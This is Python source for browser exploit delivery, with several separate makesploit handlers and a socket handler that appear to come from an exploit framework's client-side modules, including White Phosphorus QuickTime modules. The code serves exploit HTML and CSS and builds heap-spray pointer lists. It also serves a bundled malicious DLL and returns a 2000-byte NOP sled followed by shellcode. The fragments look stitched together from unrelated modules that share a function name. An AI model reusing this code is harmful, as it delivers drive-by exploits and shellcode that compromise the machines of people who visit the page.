    negative verdict returns ``(None, None)``.  The HTML branch matches
    ``self.filename`` minus its last 7 characters (presumably an
    extension - confirm against where filename is set), builds the list
    of 0x1000-spaced addresses from 0xa000 up to but excluding 0x414000,
    and hands it to ``self.search_ptr``.  A URL containing "exit" ends the
    attempt with a 302 to google.com; anything else is a 302 to
    ``self.filename``.
    """
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    if self.plugin_info:
        self.log("We got a plugin info for this target - thanks clientd!")
        if not self.is_vulnerable(self.plugin_info):
            self.log("Bailing on this client as it is not likely to be vulnerable.")
            return None, None
        self.log("This client is most likely vulnerable!")

    url = clientheader.URL
    if url.count(self.filename[:-7]):
        self.log('Serving HTML file')
        heap_base, heap_top, step = 0x0000a000, 0x00414000, 0x1000
        # Same sequence the original counting loop produced: 0x40a values,
        # heap_base, heap_base + step, ... (the span divides evenly by step).
        ptrs = list(range(heap_base, heap_top, step))
        payload.setBody(self.search_ptr(ptrs, 0))
        resp.addHeader('Content-Type', 'text/html')
    elif url.count(self.cssfile):
        self.log('Serving CSS file')
        payload.setBody(self.make_css())
        resp.addHeader('Content-Type', 'text/css')
    elif url.count("exit"):
        self.log('Max retries reached. Exploit failed. Not vulnerable?')
        resp.status = '302'
        resp.addHeader('Location', "http://www.google.com")
        resp.addHeader('Content-Type', 'text/html')
    else:
        self.log('redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')
    return resp, payload
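def handle(self, infd):
    """Serve one HTTP request on the socket *infd* and close it.

    Reads the request header and, when ``bodySize()`` is positive or the
    request was chunked, the body; asks ``self.makesploit`` for the
    response and writes it back as status line, headers, a recomputed
    ``Content-Length`` and the body.  Any ``Content-Length`` header set by
    makesploit is dropped in favour of the real body length.

    ``makesploit`` returning ``(None, None)`` - which the clientside
    modules do to decline a client - is now treated as "no response" and
    the socket is simply closed, where the original raised
    ``AttributeError`` on ``servbody.data``.  The socket is closed on
    every path via ``finally``.
    """
    self.log("Handling connection")
    try:
        clientheader = header(state="SERVER")
        clientheader.ssl = self.ssl
        clientheader.readdata(infd)
        clientbody = body()
        if not clientheader.gotGoodHeader():
            return
        if clientheader.bodySize() > 0 or clientheader.wasChunked:
            self.log("Reading body")
            clientbody.read(infd, clientheader.bodySize(), clientheader.wasChunked, 0)
            self.log("Read body")

        self.log("Creating exploit response")
        servheader, servbody = self.makesploit(clientheader, clientbody)
        if servheader is None or servbody is None:
            self.log("No response for this client - closing connection")
            return
        self.log("Responding")

        bodydata = "".join(servbody.data)
        status_line = "%s %s %s\r\n" % (servheader.version, servheader.status, servheader.msg)
        self.log(status_line)
        parts = [status_line]
        # Content-Length is always recomputed from the real body below.
        for akey in servheader.headerValuesDict.keys():
            if akey not in ["Content-Length", "Content-length"]:
                parts.append(servheader.grabHeader(akey))
        header_blob = "".join(parts)
        self.log("Sending header data of %d bytes" % len(header_blob))

        # Chunked transfer is not implemented; one Content-Length body is sent.
        response = (header_blob
                    + "Content-Length: " + str(len(bodydata)) + "\r\n"
                    + "\r\n"
                    + bodydata)
        self.log("Total response length is %d bytes" % len(response))
        try:
            infd.sendall(response)
        except socket.error:
            self.log("Connection closed by peer")
        self.log("Response sent")
    finally:
        # Connection close on every path; keep-alive is not supported.
        infd.close()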
def makesploit(self, clientheader, clientbody):
    """Serve ``self.makefile()`` for ``self.filename``; otherwise redirect to it.

    Shellcode is built only on the serving path.  The served file carries
    no Content-Type; the redirect is typed ``binary/octet-stream``.
    """
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    if not clientheader.URL.count(self.filename):
        self.log('redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'binary/octet-stream')
        return resp, payload

    self.createShellcode()
    payload.setBody(self.makefile())
    return resp, payload
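def makesploit(self, clientheader, clientbody):
    """ClientD entry point: serve the exploit HTML or the bundled DLL.

    ``wp_browserinfo`` derives (browser, osversion) from the User-Agent for
    ``self.makefile``.  A URL containing ".dll" serves
    ``3rdparty/White_Phosphorus/exploits/wp_quicktime_punk/ourdll.dll``
    (relative to the current working directory); it is now opened in
    binary mode inside a ``with`` block - the original used text mode and
    never closed the handle.  Other URLs get a 302 to ``self.filename``.
    An empty page or file returns ``(None, None)`` and skips the closing
    banner log line.
    """
    self.createShellcode()
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    banner = 'WP> ****************************************'
    self.log(banner)
    url = clientheader.URL
    self.log("WP> URL Received: %s" % url)
    ua = clientheader.getStrValue(['User-Agent'])
    browser, osversion = wp_browserinfo(ua)
    self.log('WP> OSVersion: %s' % osversion)
    self.log('WP> Browser: %s' % browser)
    self.log('WP> ')

    if url.count(self.filename):
        self.log('WP> Serving exploit html file')
        data = self.makefile(browser, osversion)
        if not data:
            return None, None
        payload.setBody(data)
        resp.addHeader('Content-Type', 'text/html')
        resp.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey())
    elif url.count('.dll'):
        self.log('WP> Serving exploit DLL file')
        dll_path = '3rdparty/White_Phosphorus/exploits/wp_quicktime_punk/ourdll.dll'
        with open(dll_path, 'rb') as fh:
            data = fh.read()
        if not data:
            return None, None
        payload.setBody(data)
        resp.addHeader('Content-Type', 'application/octet-stream')
    else:
        self.log('WP> Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')

    self.log(banner)
    return resp, payload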
def makesploit(self, clientheader, clientbody):
    """Construct the attack: every request is answered with ``self.makefile()``.

    No URL or User-Agent inspection happens; ``self.responded`` is set to 1
    as a side effect and no Content-Type is added.
    """
    from libs.spkproxy import header, body
    resp = header("SERVER")
    payload = body()
    # The served page is what redirects the browser to the overflow URL.
    payload.setBody(self.makefile())
    self.responded = 1
    return resp, payload
def makesploit(self, clientheader, clientbody):
    """ClientD entry point: serve the exploit HTML or the raw shellcode buffer.

    The page is built with ``self.makefile(ourhost)`` where ``ourhost`` is
    "http://" plus the client-supplied Host header, taken as-is.  A URL
    containing ".dll" gets 2000 bytes of 0x90 followed by
    ``self.shellcode`` (typed text/html); that buffer is never empty, so
    the emptiness check on it cannot trigger.  Other URLs get a 302 to
    ``self.filename``.
    """
    self.createShellcode()
    from libs.spkproxy import header, body
    resp = header('SERVER')
    payload = body()

    banner = 'WP> ****************************************'
    self.log(banner)
    url = clientheader.URL
    self.log("WP> URL Received: %s" % url)
    ua = clientheader.getStrValue(['User-Agent'])
    browser, osversion = wp_browserinfo(ua)
    self.log('WP> OSVersion: %s' % osversion)
    self.log('WP> Browser: %s' % browser)
    self.log('WP> ')

    if url.count(self.filename):
        self.log('WP> Serving exploit html file')
        # Host header is not validated before being embedded in the page.
        ourhost = "http://" + clientheader.getStrValue(['Host'])
        data = self.makefile(ourhost)
        if not data:
            return None, None
        payload.setBody(data)
        resp.addHeader('Content-Type', 'text/html')
        resp.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey())
    elif url.count('.dll'):
        self.log('WP> Serving shellcode buffer')
        data = "\x90" * 2000 + self.shellcode
        if not data:
            return None, None
        payload.setBody(data)
        resp.addHeader('Content-Type', 'text/html')
    else:
        self.log('WP> Redirecting to self')
        resp.status = '302'
        resp.addHeader('Location', self.filename)
        resp.addHeader('Content-Type', 'text/html')

    self.log(banner)
    return resp, payload